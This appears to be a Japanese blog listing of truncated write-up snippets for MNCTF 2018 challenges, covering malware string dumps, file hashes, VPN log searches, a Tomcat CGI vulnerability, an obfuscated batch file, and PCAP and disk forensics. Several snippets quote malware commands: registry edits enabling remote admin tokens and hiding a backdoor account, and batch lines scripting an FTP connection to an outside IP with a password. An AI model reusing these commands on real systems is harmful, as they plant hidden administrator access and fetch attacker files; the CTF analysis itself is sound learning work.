ls -lコマンドでディレクトリ内を見てみると、. のファイル？らしきものが。 このような名前のファイルをcatで見ようとしてもエラーになるので、後ろに＊をつけて見てみます。 フラグがありました。

マルウェアをStringsコマンドで実行しました。 # strings AD_OptimizationTool.exe !This program cannot be run in DOS mode. .text .data @.import hO @ hK @ h| @ AD Optimizer Optimization successfuly finished.\nThe speed increased 176%. /c net us…

問題のzipファイルを展開すると実行ファイルが出てきました。 Linux環境でsha256sum <ファイル名>でSHA256ハッシュ値（フラグ）を求めました。 # sha256sum AD_OptimizationTool.exe f24f5629be2e0f821adb36fe4d47407937f5a318bf96ae3655b628f833040f29 AD_O…

前問のパケットをみると、ファイルをアップロードしているので、その脆弱性について調べたら以下のような記事がでてきました。

アクセスしてみます。 Flagを押しても、あなたgoogleじゃないでしょ、みたいに拒否されます。 chromeで開いてるのに？？ 調べてみたら、chromeでF12を押すとディベロッパーツールが開けて、そこから色々調節するみたいです。 F12→Network→NetworkConditionで…

ハッシュ値、ファイルサイズは以下のように求めました。 # md5sum AD_OptimizationTool.exe 541427a9dbe43b10c05b856cdcdc5ba6 AD_OptimizationTool.exe # sha1sum AD_OptimizationTool.exe e0fa838e0f191f97c5dac7a831af60d750432017 AD_OptimizationTool.e…

とりあえず、バイナリデータとしてダウンロードしたファイルを開きます。 最後のほうにexeファイルのURLがありました。

とりあえず、ネットでTomcatサーバの脆弱性について検索してみました。 Apache Tomcatの「Common Gateway Interface（CGI）」サーブレットに関して、遠隔からのコード実行（Remote Code Execution、RCE）の脆弱性が確認されました。この深刻度の高い脆弱性が…

# curl http://mnctf.info/mnctf2018/task/vpn20180712.log | grep vpnadmin 2018/07/13 15:01,vpnadmin,27.117.128.1 前の問題でuser名はvpnadminと分かりました。このコマンドで一発で出てきました。2018/07/13 15:01がフラグです。

標的攻撃ⅡのフラグのPPORT_388945a1をネットで検索すると、 OceanLotusというグループ（フラグ）であることが分かる。

batファイルの続きにＦＴＰサーバーへのアクセスが見えるので、アクセスしました。 if A%USERDOMAINJkjNCIMZMscrSkoGFOOM% echo open 157.7.53.197> temp.txt echo P455w0rd>> temp.txt REM Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed d…

前の問題で分かっているIPをググってみます。 2018/07/13 15:01,vpnadmin,27.117.128.1 韓国でした。

zipファイルを与えられたパスワードを使って解凍しました。 batファイルがあるので、VScodeで開いてみました。 %P%@%r%e%I%c%g%h%E%o%R% %I%o%y%f%J%f%L% %d%R%f%E%R%M%z% %y%T%z%O%g%O%M%L%l% %P%N%F%A%u%M%E%E%I%:%E% %Y% %E% %F%X%b%L%b%S%S%_%W%S%l%t%K%…

/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f && reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v SUPPORT_388…

設定シートを見てみると、１階のどこかかな？とあたりがつきます。PCAPファイルをWireSharkで開きます。 locationで検索してみます。かなり絞れたのでひとつずつ見ていきます。 1F_factory（フラグ）という文字列がASCIIにありました。

ディスクイメージファイル（diskimage.vmdk ）を渡されるので、FTK Imagerで削除されたファイル等がないか見てみます。 rootディレクトリを見ると、a.exe というファイルが削除された痕跡があります。右クリックしてハッシュ値を取り出します。 ハッシュ値（…

サイトにアクセスすると、 パスワードファイルの password.php と、URLを入力するとHTTPのリクエストヘッダとレスポンスヘッダを表示してくれる webchecker.php というサイトのURLがあります。 パスワードファイルはみれませんでした。webcheckerのホスト名…

標的攻撃Ⅰで見つけた怪しい実行ファイルを、FTK Imagerを使ってエクスポートします。 マルウェアを実行するのは怖いですが、、、 Linux環境でstringsコマンドで実行しました。 # strings a.EXE !This program cannot be run in DOS mode. .text .data @.impo…

まずはファイルの拡張子はpngとなっているものの、画像ファイルとして開けないので、攻撃グループBlackTechが使うマルウエアPLEADダウンローダ（ヒントのサイト）のようにバイナリエディタで開くことにしました。 いつも使っているVisual Studio Codeの拡張…